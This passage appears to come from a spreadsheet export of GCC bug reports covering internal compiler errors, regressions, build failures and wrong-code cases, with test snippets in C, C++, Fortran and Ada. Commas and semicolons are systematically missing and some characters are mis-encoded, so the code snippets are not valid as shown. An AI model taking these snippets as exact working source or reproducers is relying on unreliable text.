GNU C++ version 3.4.4 (Gentoo 3.4.4-r1 ssp-3.4.4-1.0 pie-8.7.8)
(i686-pc-linux-gnu)
        compiled by GNU C version 3.4.3-20050110 (Gentoo Linux
3.4.3.20050110-r2 ssp-3.4.3.20050110-0 pie-8.7.7).
GGC heuristics: --param ggc-min-expand=90 --param ggc-min-heapsize=113194
 /usr/lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../i686-pc-linux-gnu/bin/as -V
-Qy -o test.o test.s
GNU assembler version 2.15.92.0.2 (i686-pc-linux-gnu) using BFD version
2.15.92.0.2 20040927
 /usr/libexec/gcc/i686-pc-linux-gnu/3.4.4/collect2 --eh-frame-hdr -m elf_i386
-dynamic-linker /lib/ld-linux.so.2
/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/../../../crt1.o
/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/../../../crti.o
/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/crtbegin.o
-L/usr/lib/gcc/i686-pc-linux-gnu/3.4.4 -L/usr/lib/gcc/i686-pc-linux-gnu/3.4.4
-L/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/../../../../i686-pc-linux-gnu/lib
-L/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/../../.. test.o -lstdc++ -lm -lgcc_s
-lgcc -lc -lgcc_s -lgcc /usr/lib/gcc/i686-pc-linux-gnu/3.4.4/crtend.o
/usr/lib/gcc/i686-pc-linux-gnu/3.4.4/../../../crtn.o
---------------------------------------------------------------------------
--------------------------------
$ LC_ALL=C ./a.out
$
$ LC_ALL=nl_BE ./a.out
Segmentation fault
--------------------------------------</t>
  </si>
  <si>
    <t>plors</t>
  </si>
  <si>
    <t>GCC-69169</t>
  </si>
  <si>
    <t>[6 Regression] ICE (segfault) on powerpc64le-linux-gnu</t>
  </si>
  <si>
    <t>trunk r232077 powerpc64le-linux-gnu works with -O1
reduced test case:
struct pgm_slist_t {
  struct pgm_slist_t *__restrict next
} fn1(struct pgm_slist_t p1) {
}
$ gcc -c -g -O2 slist.i 
gcc: internal compiler error: Segmentation fault (program cc1)
Please submit a full bug report
with preprocessed source if appropriate.
infinite recursion?
#0  0x00003fffb7936308 in ?? () from /lib/powerpc64le-linux-gnu/libc.so.6
#1  0x00003fffb7939708 in malloc () from /lib/powerpc64le-linux-gnu/libc.so.6
#2  0x0000000010e3efb8 in xrealloc (oldmem= size=136) at ../../src/libiberty/xmalloc.c:178
#3  0x000000001087419c in va_heap::reserve (exact= reserve= 
    v=) at ../../src/gcc/vec.h:288
#4  vec::reserve (exact=false nelems=1 this=)
    at ../../src/gcc/vec.h:1406
#5  vec::safe_push (obj=... this=) at ../../src/gcc/vec.h:1515
#6  push_fields_onto_fieldstack (type=0x3fffb5c6e508 fieldstack=0x3ffffc000320 offset=0)
    at ../../src/gcc/tree-ssa-structalias.c:5499
#7  0x000000001087f9e0 in create_variable_info_for_1 (decl=0x20852020 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5810
#8  0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851f00 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#9  0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851de0 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#10 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851cc0 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#11 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851ba0 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#12 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851a80 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#13 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851960 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#14 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851840 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#15 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851720 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#16 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851600 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#17 0x000000001087fe0c in create_variable_info_for_1 (decl=0x208514e0 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#18 0x000000001087fe0c in create_variable_info_for_1 (decl=0x208513c0 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#19 0x000000001087fe0c in create_variable_info_for_1 (decl=0x208512a0 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#20 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851180 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911
#21 0x000000001087fe0c in create_variable_info_for_1 (decl=0x20851060 name=0x10f93cf8 PARM_NOALIAS 
    add_id=true handle_param=true) at ../../src/gcc/tree-ssa-structalias.c:5911</t>
  </si>
  <si>
    <t>GCC-66304</t>
  </si>
  <si>
    <t>[6 Regression] Can't bootstrap on x86_64-linux-gnu with gcc 4.3.4</t>
  </si>
  <si>
    <t>Created attachment 35634
config.log
Hello.
Starting from r223691 I have following error in stage1:
g++ -c   -g -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I../../gcc -I../../gcc/build -I../../gcc/../include  -I../../gcc/../libcpp/include  \
	-o build/genmddeps.o ../../gcc/genmddeps.c
cc1plus: error: unrecognized command line option -Wno-narrowing
I see very suspicious lines in config.log file which I attached:
configure:6330: result: yes
configure:6382: checking for int64_t underlying type
configure:6406: g++ -c -g   conftest.cpp &gt;&amp;5
configure:6406: $? = 0
configure:6413: result: long
configure:6485: checking whether gcc supports -W
configure:6502: g++ -c -g   conftest.cpp &gt;&amp;5
configure:6502: $? = 0
configure:6511: result: yes
configure:6485: checking whether gcc supports -Wall
configure:6502: g++ -c -g   conftest.cpp &gt;&amp;5
configure:6502: $? = 0
configure:6511: result: yes
configure:6485: checking whether gcc supports -Wnarrowing
configure:6502: g++ -c -g   conftest.cpp &gt;&amp;5
configure:6502: $? = 0
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-50514</t>
  </si>
  <si>
    <t>gfortran should check ISHFT &amp; ISHFTC aruments (r178939)</t>
  </si>
  <si>
    <t>! gfortran should check ISHFT &amp; ISHFTC aruments (r178939)
! gfortran should not accept SHIFT&gt;BIT_SIZE(I)
      print *ishft(I=mSHIFT=640)
      print *ishftc(I=mSHIFT=640)
! abs(SHIFT) must be &lt;= SIZE
      print *ishftc(I=mSHIFT=1SIZE=0)
      end</t>
  </si>
  <si>
    <t>GCC-22164</t>
  </si>
  <si>
    <t>GNAT rejects matching parameter in generic instantiation as non-matching</t>
  </si>
  <si>
    <t>(Debian bug #315414)
--  ARM 15.5.3(7): The component subtypes of the formal and actual
--  array types shall statically match.
generic
package P is
    type T is private
private
    type T is new Integer
end P
generic
    type Formal_Array_Type is array (Positive range ) of T
package P.Q is
end P.Q
with P.Q
package Test_315414 is
    package Instance_Of_P is new P
    type Array_Type is array (Positive range ) of Instance_Of_P.T
    package Instance_Of_Q is new P.Q (Formal_Array_Type =&gt; Array_Type)
end Test_315414
The compiler should accept the program but says:
test_315414.ads:9:49: component subtype of actual does not match that of formal
Formal_Array_Type
test_315414.ads:9:49: instantiation abandoned
gnatmake: test_315414.ads compilation error</t>
  </si>
  <si>
    <t>GCC-68775</t>
  </si>
  <si>
    <t>[6 Regression] spec2006 test case 465.tonto fails with the gcc 6.0 fortran compiler</t>
  </si>
  <si>
    <t>The spec2006 test case 465.tonto fails with the gcc 6.0 fortran compiler on powerpc.  The failure started with revision r230855.  The compilation works but the output of the test is wrong.
r230855 | rguenth | 2015-11-25 02:53:22 -0600 (Wed 25 Nov 2015) | 6 lines
2015-11-25  Richard Biener  
	PR tree-optimization/68492
	* tree-vect-slp.c (vect_build_slp_tree): Consistently build up
	op from scalars after operand swapping.
Options used were:  -m64 -O3 -mcpu=power8 -fpeel-loops -funroll-loops -ffast-math -fvect-cost-model -mpopcntd -mrecip=rsqrt
Minimal option set to cause the failure:  -m64 -O3 -mcpu=power8 -ffast-math
Note that it succeeds with -mcpu=power7</t>
  </si>
  <si>
    <t>GCC-54368</t>
  </si>
  <si>
    <t>[c++0x] Internal error when passing an identifier in static_assert instead of string-literal</t>
  </si>
  <si>
    <t>Created attachment 28078
Automatically created attachment: /tmp/ccWAFQ2I.out
This simple code causes an internal error:
    char *string = 1
    int main() {
        static_assert(0 string)
    }
This is the result of my compiling attempt:
$ g++ --std=c++11 bug.cc                                                                                                                                                      
bug.cc: In function 'int main()':                                                                                                                                                                           
bug.cc:4:22: error: expected string-literal before 'string'                                                                                                                                                 
bug.cc:4:22: error: expected ')' before 'string'                                                                                                                                                            
bug.cc:4:5: internal compiler error: tree check: expected string_cst have error_mark in finish_static_assert at cp/semantics.c:5135                                                                       
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc3YRBkR.out file please attach this to your bugreport.
razinov@razinov-desktop ~/tmp $ 
As you can find EVERY type of the variable string causes the same error.
Environment: gcc version 4.8.0 20120314 (experimental) [trunk revision 185382] (Ubuntu/Linaro 20120314-0ubuntu2)</t>
  </si>
  <si>
    <t>im.razzy</t>
  </si>
  <si>
    <t>GCC-38086</t>
  </si>
  <si>
    <t>[4.3 Regression] libgomp fails to build if assembler doesn't support .symver</t>
  </si>
  <si>
    <t>Building current mainline on Solaris 11/SPARC with GNU ld 2.19 and Sun as fails
when building libgomp:
libtool: compile:  /vol/gccsrc/obj/gcc-4.4.0-20081110/11-gcc-gld/./gcc/xgcc -B/vol/gccsrc/obj/gcc-4.4.0-20081110/11-gcc-gld/./gcc/ -B/vol/gcc/sparc-sun-solaris2.11/bin/ -B/vol/gcc/sparc-sun-solaris2.11/lib/ -isystem /vol/gcc/sparc-sun-solaris2.11/include -isystem /vol/gcc/sparc-sun-solaris2.11/sys-include -DHAVE_CONFIG_H -I. -I/vol/gcc/src/gcc-dist/libgomp -I. -I/vol/gcc/src/gcc-dist/libgomp/config/posix -I/vol/gcc/src/gcc-dist/libgomp -Wall -pthread -Werror -g -O2 -MT lock.lo -MD -MP -MF .deps/lock.Tpo -c /vol/gcc/src/gcc-dist/libgomp/config/posix/lock.c  -fPIC -DPIC -o .libs/lock.o
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 10: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 10: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 10: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 10: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 11: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 11: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 11: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 12: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 12: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 12: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 12: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 13: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 13: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 13: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 14: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 14: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 14: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 14: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 15: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 15: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 15: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 16: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 16: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 16: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 16: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 17: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 17: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 17: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 18: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 18: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 18: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 18: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 19: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 19: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 19: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 20: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 20: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 20: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 20: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 21: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 21: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 21: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 22: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 22: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 22: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 22: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 23: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 23: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 23: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 24: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 24: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 24: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 24: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 25: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 25: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 25: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 26: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 26: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 26: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 26: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 27: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 27: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 27: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 28: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 28: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 28: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 28: error: statement syntax
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 29: error: unknown opcode .symver
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 29: error: invalid character (0x40)
/usr/bin/as: /var/tmp//ccPRa4Qu.s line 29: error: statement syntax
make[4]: *** [lock.lo] Error 1
Obviously the system assembler doesn't support .symver thus config/posix/lock.c (at least) must not use omp_lock_symver.
I'm unsure how best to fix this: one could either augment LIBGOMP_ENABLE_SYMVERS
to check for assembler support (which may be too much) or introduce an
additional conditional for the use of .symver.</t>
  </si>
  <si>
    <t>GCC-54200</t>
  </si>
  <si>
    <t>copyrename generates wrong debuginfo</t>
  </si>
  <si>
    <t>For gcc.target/i386/pad-10.c copyrename transforms
foo2 (int z int x)
{
  int D.1754
:
  if (x_2(D) == 1)
    goto 
  else
    goto 
:
  bar ()
  D.1754_4 = z_3(D)
  goto 
:
  D.1754_5 = x_2(D) + z_3(D)
:
  # D.1754_1 = PHI 
  return D.1754_1
}
to
foo2 (int z int x)
{
:
  if (x_2(D) == 1)
    goto 
  else
    goto 
:
  bar ()
  z_4 = z_3(D)
  goto 
:
  z_5 = x_2(D) + z_3(D)
:
  # z_1 = PHI 
  return z_1
}
note the bogus stmts
   z_5 = x_2(D) + z_3(D)
:
   # z_1 = PHI 
   return z_1
which assign to z values different from the incoming parameter value.
[the question is if copyrename is still useful now that we have VTA
and will insert debug stmts for assignments to names we'd loose over
a copyprop/dce combo]</t>
  </si>
  <si>
    <t>GCC-56490</t>
  </si>
  <si>
    <t>[4.7 Regression] -Wall triggering infinite loop</t>
  </si>
  <si>
    <t>Created attachment 29559
Testcase: Loops forever with -O2 -Wall
Compiling testcase gfortran seems to loop forever.
gfortran -c -O -Wall testcase.f 
leaving out -Wall seems to compile o.k.
Have to problem on several independent gcc distros: This one for instance:
COLLECT_GCC=/usr/local/gcc-4.6.3/bin/gcc
COLLECT_LTO_WRAPPER=/usr/local/gcc-4.6.3/libexec/gcc/x86_64-unknown-linux-gnu/4.6.3/lto-wrapper
Ziel: x86_64-unknown-linux-gnu
Konfiguriert mit: /soft/os/gcc/gcc-4.6.3/gcc-4.6.3/configure --srcdir=/soft/os/gcc/gcc-4.6.3/gcc-4.6.3 --prefix=/usr/local/gcc-4.6.3 --with-included-gettext --enable-__cxa_atexit --enable-threads --enable-shared --enable-languages=cc++fortran --enable-libgcj --enable-ssp --disable-libssp --with-gmp-include=/usr/local/devel/gmp/5.0.1-static/include --with-gmp-lib=/usr/local/devel/gmp/5.0.1-static/lib64 --with-mpfr-include=/usr/local/devel/mpfr/2.4.2-static/include --with-mpfr-lib=/usr/local/devel/mpfr/2.4.2-static/lib64 --with-mpc-include=/usr/local/devel/mpc/0.8.1-static/include --with-mpc-lib=/usr/local/devel/mpc/0.8.1-static/lib64
Thread-Modell: posix
gcc-Version 4.6.3 (GCC)</t>
  </si>
  <si>
    <t>GCC-3887</t>
  </si>
  <si>
    <t xml:space="preserve"> 	Bonjour
 Le 30 juillet 2001 Ade Talabi a Ã©crit :
 &gt; What is it with that empty template template?
 It is specialization.
 -- 
 Boujou t'chu tÃ¨.
 Franck Branjonneau 
Release:
unknown</t>
  </si>
  <si>
    <t>fasbjx</t>
  </si>
  <si>
    <t>GCC-19302</t>
  </si>
  <si>
    <t>intrinsic_nearest.f90 fails</t>
  </si>
  <si>
    <t>The test intrinsic_nearest.f90 from the fortran testsuite included with gcc
fails on sparc-sun-solaris2.9 will all optimization levels. I can reduce it to
the following code:
-------------------------------------------
program test_nearest
  real inf max x
  integer infi maxi
  equivalence (infinfi)
  equivalence (maxmaxi)
! ??? This is pretty sketchy but passes on most targets.
  infi = z'7f800000'
  maxi = z'7f7fffff'
  x = nearest (-inf 1.0)
  print * x -max
  if (x .ne. -max) call abort()
end
-------------------------------------------
The comment (from the original test file) makes me feel that perhaps the nearest
intrinsic is fine but only the values for infi and maxi are proven wrong but
I'm not really sure. And if it's the case some more universal values should
be fed in.</t>
  </si>
  <si>
    <t>GCC-47324</t>
  </si>
  <si>
    <t>r160124 caused g++.dg/torture/stackalign failures with -O3 -g at -m32 on darwin</t>
  </si>
  <si>
    <t>This is the last remaining breakage with the stackalign tests on x86 darwin10. We are failing...
FAIL: g++.dg/torture/stackalign/eh-alloca-1.C  -O3 -g  execution test
FAIL: g++.dg/torture/stackalign/eh-vararg-1.C  -O3 -g  execution test
FAIL: g++.dg/torture/stackalign/eh-vararg-2.C  -O3 -g  execution test
FAIL: g++.dg/torture/stackalign/eh-alloca-1.C  -O3 -g  execution test
FAIL: g++.dg/torture/stackalign/eh-vararg-1.C  -O3 -g  execution test
FAIL: g++.dg/torture/stackalign/eh-vararg-2.C  -O3 -g  execution test
These tests don't fail their execution tests if the -g is omitted. However if I take a failing test and strip the eh-alloca-1.o object file created with -g using 'strip -S eh-alloca-1.o' and relink the testcase it still fails. So the failure is dependent on -g being passed to the testcase but not the debug code generated.
Comparing the disassembled eh-alloca-1.o file (using 'otool -tv eh-alloca-1.o') created with -g0 to that created with -g and then stripped with 'strip -S' I find the following diff.
--- disasm_g0.txt	2011-01-16 16:33:15.000000000 -0500
+++ disasm_g_stripped.tex	2011-01-16 16:52:28.000000000 -0500
@@ -7610 +7610 @@ 
 000000ed	calll	0x100000000
 000000f2	movl	$0x00000004(%esp)
 000000f9	calll	0x100000000
-000000fe	movl	0x000002cb(%ebx)%edx
+000000fe	movl	0x00000d50(%ebx)%edx
 00000104	addl	$0x0c%edx
 00000107	movl	%edx(%eax)
-00000109	movl	0x000002d3(%ebx)%edx
+00000109	movl	0x00000d58(%ebx)%edx
 0000010f	movl	$0x000000000x08(%esp)
 00000117	movl	%eax(%esp)
 0000011a	movl	%edx0x04(%esp)</t>
  </si>
  <si>
    <t>GCC-20043</t>
  </si>
  <si>
    <t>[4.0 Regression] transparent_union doesn't allow restrict qualifier removal</t>
  </si>
  <si>
    <t>GCC 4 now produces a conflicting types error for code that gcc 3.4 accepts
without complaint.  This usage pattern occurs when using glibc's 
with _GNU_SOURCE defined followed by a POSIX-compliant redeclaration of
function like `accept'.  This is what transparent_union was invented to support.</t>
  </si>
  <si>
    <t>GCC-2051</t>
  </si>
  <si>
    <t>IA64 gcc crashes in certain situations when creating debug info.</t>
  </si>
  <si>
    <t xml:space="preserve">	gcc crashes when compiling certain parts of code with
	debugging enabled (-g). Changing -g to -g1 makes it work same
	goes when reducing the  optimization level from -O2 to -O0
	(-O1 fails as well).
Release:
3.1 20010221 (experimental)
Environment:
System: Linux itanic 2.4.1 #2 SMP Tue Feb 6 16:27:48 EST 2001 ia64 unknown
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: ia64-unknown-linux-gnu
configured with: ../gcc/configure --prefix=/data/tool2 --target=ia64-linux : (reconfigured)  : (reconfigured)  : (reconfigured) ../gcc/configure --host=ia64-linux --prefix=/data/tool2 --target=ia64-linux : (reconfigured)
How-To-Repeat:
 ../include/libc-symbols.h     -o doo.o
../sysdeps/wordsize-64/strtol.c: In function `strtol':
../sysdeps/wordsize-64/strtol.c:14: Internal compiler error in add_abstract_origin_attribute at dwarf2out.c:9331
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-37483</t>
  </si>
  <si>
    <t>[4.4 Regression] Segfault in noce_try_sign_mask (ifcvt.c): b_unconditional</t>
  </si>
  <si>
    <t>With current trunk on powerpc (revision 140291):
(sid)2644:tbm@test: ..4.3-2008-09-11-r140291/gcc] ./cc1plus -quiet -O3 -maltivec ~/gdc-4.2-constfold.ii
../../src/gcc/d/dmd/constfold.c: In function 'Expression* Ushr(Type* Expression* Expression*)':
../../src/gcc/d/dmd/constfold.c:635: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-52797</t>
  </si>
  <si>
    <t>[4.8 Regression] Revision 185913 causes ICE in get_loop_body at cfgloop.c:831 on PowerPC</t>
  </si>
  <si>
    <t>ICE during build of libstdc++.
/home/pthaugen/src/gcc/trunk/gcc/libstdc++-v3/src/c++98/streambuf.cc:113:5: internal compiler error: in get_loop_body at cfgloop.c:831
Please submit a full bug report
Config command used:
/home/pthaugen/src/gcc/trunk/gcc/configure --prefix=/home/pthaugen/install/gcc/trunk --target=powerpc64-linux --host=powerpc64-linux --build=powerpc64-linux --enable-secureplt --enable-threads=posix --enable-shared --enable-__cxa_atexit --with-long-double-128 --enable-decimal-float --disable-alsa --enable-checking --with-lto --with-as=/home/pthaugen/install/binutils/binutils-2.21.1/bin/as --with-ld=/home/pthaugen/install/binutils/binutils-2.21.1/bin/ld --with-gmp=/home/pthaugen/install/gcc-host-libs --with-mpfr=/home/pthaugen/install/gcc-host-libs --with-mpc=/home/pthaugen/install/gcc-host-libs --with-ppl=/home/pthaugen/install/gcc-host-libs --with-cloog=/home/pthaugen/install/gcc-host-libs --with-host-libstdcxx=-Wl-Bstatic-L/home/pthaugen/install/gcc-host-libs/lib-lstdc++-Bdynamic-lm --enable-languages=cfortranc++ --disable-bootstrap</t>
  </si>
  <si>
    <t>GCC-46910</t>
  </si>
  <si>
    <t>std::shared_ptr requires public destructor for a class with friend deleter</t>
  </si>
  <si>
    <t>Created attachment 22726
Code example and compiler output
class TestA
{
public:
  static std::shared_ptr CreateTestA()
private:
  TestA()
  ~TestA()
private:
  class Deleter
  friend class Deleter
}
class TestA::Deleter
{
public:
  void operator()( TestA * p)
  {
    std::cout &lt;&lt; Deleting TestA\n
    delete p
  }
}
std::shared_ptr TestA::CreateTestA()
{
  return std::shared_ptr(
                                new TestA()
                                TestA::Deleter()
                                )
}
will not compile:
error: â€˜TestA::~TestA()â€™ is private
The boost shared_ptr works OK.</t>
  </si>
  <si>
    <t>gccbugzilla</t>
  </si>
  <si>
    <t>GCC-44864</t>
  </si>
  <si>
    <t>[OOP] ICE: Segmentation fault</t>
  </si>
  <si>
    <t>This code generates an internal compiler error (the same code as in Bug Report 44863 but with certain lines uncommented):
!================================================================================                
module BaseStrategy
  type public abstract :: Strategy
   contains
     procedure(strategy_update) pass( this ) deferred :: update
     procedure(strategy_pre_update) pass( this ) deferred :: preUpdate
     procedure(strategy_post_update) pass( this ) deferred :: postUpdate
  end type Strategy
  abstract interface
     subroutine strategy_update( this )
       import Strategy
       class (Strategy) target intent(in) :: this
     end subroutine strategy_update
  end interface
  abstract interface
     subroutine strategy_pre_update( this )
       import Strategy
       class (Strategy) target intent(in) :: this
     end subroutine strategy_pre_update
  end interface
  abstract interface
     subroutine strategy_post_update( this )
       import Strategy
       class (Strategy) target intent(in) :: this
     end subroutine strategy_post_update
  end interface
end module BaseStrategy
!================================================================================                
module LaxWendroffStrategy
  use BaseStrategy
  private :: update preUpdate postUpdate
  type public extends( Strategy ) :: LaxWendroff
     class (Strategy) pointer :: child =&gt; null()
     contains
       procedure pass( this ) :: update
       procedure pass( this ) :: preUpdate
       procedure pass( this ) :: postUpdate
  end type LaxWendroff
contains
  subroutine update( this )
    class (LaxWendroff) target intent(in) :: this
    print * 'Calling LaxWendroff update'
  end subroutine update
  subroutine preUpdate( this )
    class (LaxWendroff) target intent(in) :: this
    print * 'Calling LaxWendroff preUpdate'
  end subroutine preUpdate
  subroutine postUpdate( this )
    class (LaxWendroff) target intent(in) :: this
    print * 'Calling LaxWendroff postUpdate'
  end subroutine postUpdate
end module LaxWendroffStrategy
!================================================================================                
module KEStrategy
  use BaseStrategy
  ! Uncomment the line below and it runs fine                                                    
  ! use LaxWendroffStrategy                                                                      
  private :: update preUpdate postUpdate
  type public extends( Strategy ) :: KE
     class (Strategy) pointer :: child =&gt; null()
     contains
       procedure pass( this ) :: update
       procedure pass( this ) :: preUpdate
       procedure pass( this ) :: postUpdate
  end type KE
contains
  subroutine init( this other )
    class (KE) intent(inout) :: this
    class (Strategy) target intent(in) :: other
    this % child =&gt; other
  end subroutine init
  subroutine update( this )
    class (KE) target intent(in) :: this
    if ( associated( this % child ) ) then
       call this % child % update()
    end if
    print * 'Calling KE update'
  end subroutine update
 subroutine preUpdate( this )
    class (KE) target intent(in) :: this
    if ( associated( this % child ) ) then
       call this % child % preUpdate()
    end if
    print * 'Calling KE preUpdate'
  end subroutine preUpdate
  subroutine postUpdate( this )
    class (KE) target intent(in) :: this
    if ( associated( this % child ) ) then
       call this % child % postUpdate()
    end if
    print * 'Calling KE postUpdate'
  end subroutine postUpdate
end module KEStrategy
!================================================================================                
program main
  use LaxWendroffStrategy
  use KEStrategy
  type :: StratSeq
     class (Strategy) pointer :: strat =&gt; null()
  end type StratSeq
  type (LaxWendroff) target :: lw_strat
  type (KE) target :: ke_strat
